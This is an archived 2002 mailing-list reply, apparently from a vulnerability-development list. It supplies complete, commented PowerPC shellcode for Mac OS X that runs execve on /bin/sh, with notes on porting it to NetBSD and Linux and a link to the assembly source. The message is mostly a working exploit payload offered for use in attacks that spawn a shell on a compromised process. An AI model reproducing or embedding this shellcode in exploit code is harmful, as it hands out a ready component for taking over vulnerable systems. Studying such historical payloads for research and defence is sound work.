Here is some shellcode that I wrote a while back. It was written and tested on a G3 running OSX 10.0.x - 10.1.x. IIRC it worked fine on NetBSD also (same syscall number for execve) and fine on Linux with a changed system call number. The assembly language source and header files are available at http://www.dopesquad.net/security. /* PPC MacOS X (maybe others) shellcode * * ghandi <ghandiat_private> */ char shellcode[] = "\x7c\xa5\x2a\x79" /* xor. r5, r5, r5 ; r5 = NULL */ "\x40\xa2\xff\xfd" /* bnel shellcode */ "\x7f\xe8\x02\xa6" /* mflr r31 */ "\x3b\xff\x01\x30" /* addi r31, r31, 268+36 */ "\x38\x7f\xfe\xf4" /* addi r3, r31, -268 ; r3 = path */ "\x90\x61\xff\xf8" /* stw r3, -8(r1) ; argv[0] = path */ "\x90\xa1\xff\xfc" /* stw r5, -4(r1) ; argv[1] = NULL */ "\x38\x81\xff\xf8" /* subi r4, r1, 8 ; r4 = {path, 0} */ "\x3b\xc0\x76\x01" /* li r30, 30209 */ "\x7f\xc0\x4e\x70" /* srawi r0, r30, 9 */ "\x44\xff\xff\x02" /* sc ; execve(r3, r4, r5) */ "/bin/sh" ; -- ghandi / ghandiat_private / www.dopesquad.net "Bein' Crazy is the least of my worries." - Jack Kerouac C439 2B06 D8D2 A2D8 1ABB 0A55 A61D 9057 63F5 9B1F On Thu, 10 Jan 2002, Josha Bronson wrote: > Greetins VulnDev, > > Anyone have some pointers (hah.. punny..) to shellcode examples for OS > X? > > Thanks in advance, > -- > Josha Bronson > dmuzat_private > AngryPacket Security >
This archive was generated by hypermail 2b30 : Thu Jan 10 2002 - 17:39:01 PST